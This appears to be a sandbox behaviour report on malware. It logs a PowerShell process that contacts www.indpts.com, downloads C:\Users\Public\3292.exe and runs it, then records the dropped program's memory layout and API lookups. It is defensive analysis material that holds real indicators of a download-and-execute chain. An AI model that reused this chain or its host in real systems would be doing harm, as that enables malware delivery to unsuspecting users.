Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	3	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn

Thread 0xb0c

(Host: 12, Network: 3)

Category	Operation	Information	Count	Logfile
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Inet	Close Session	-	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn

Thread 0xb14

(Host: 68, Network: 14)

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	24	Fn
Environment	Get Environment String	name = PubLic, result_out = C:\Users\Public	2	Fn
Environment	Get Environment String	name = PubLIC, result_out = C:\Users\Public	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = public, result_out = C:\Users\Public	2	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes	2	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459	1	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	2	Fn
File	Create	filename = C:\Users\Public\3292.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\Public\3292.exe, type = file_type	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY	2	Fn Data
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
System	Get Info	type = Operating System	2	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	-	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	8	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = www.indpts.com, address_out = 108.163.227.35	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Connect	remote_address = 108.163.227.35, remote_port = 80	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 69, size_out = 69	1	Fn Data
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Inet	Open Connection	protocol = http, server_name = www.indpts.com, server_port = 80	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /UHSD/	1	Fn
Inet	Send HTTP Request	headers = host: www.indpts.com, connection: Keep-Alive, url = www.indpts.com/UHSD/	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	filename = C:\Users\Public\3292.exe, type = file_attributes	1	Fn

Thread 0xb28

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Process	Create	process_name = C:\Users\Public\3292.exe, show_window = SW_SHOWNORMAL		1	Fn

Process #4: 3292.exe

(Host: 59, Network: 0)

Information	Value
ID	#4
File Name	c:\users\public\3292.exe
Command Line	"C:\Users\Public\3292.exe"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:28, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:55

OS Process Information

Information	Value
PID	0xb2c
Parent PID	0xaec (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B30

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000f1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x0010dfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0011dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000120000	0x00120000	0x0012ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000270000	0x00270000	0x0034efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000360000	0x00360000	0x0045ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000005b0000	0x005b0000	0x0062ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000780000	0x00780000	0x0087ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000880000	0x00880000	0x00a07fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a10000	0x00a10000	0x00b90fff	Pagefile Backed Memory	Readable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000021d0000	0x021d0000	0x021dffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x021e0000	0x024aefff	Memory Mapped File	Readable	Region Actions
private_0x00000000024b0000	0x024b0000	0x026cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000026d0000	0x026d0000	0x02aa0fff	Private Memory	Readable, Writable	Region Actions Download Dump
uxtheme.dll	0x74650000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x74800000	0x74850fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x74860000	0x74891fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msacm32.dll	0x748a0000	0x748b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xb30

(Host: 59, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:12 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 93725	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:12 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 93725	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:12 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 93741	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:12 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 93741	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:12 (Local Time)	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:12 (Local Time)	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x45f884	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x45f8bc	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Get Address	function = UnmapViewOfFile, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Get Address	function = VirtualProtect, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Get Address	function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Get Address	function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x752a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x752adbeb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x752a9894	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x752a9cee	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x75aa6aa8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75a01700	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x75a2828e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75a05929	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75a23102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75a014b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x75a1b6e0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameExA, address_out = 0x75a842ef	1	Fn
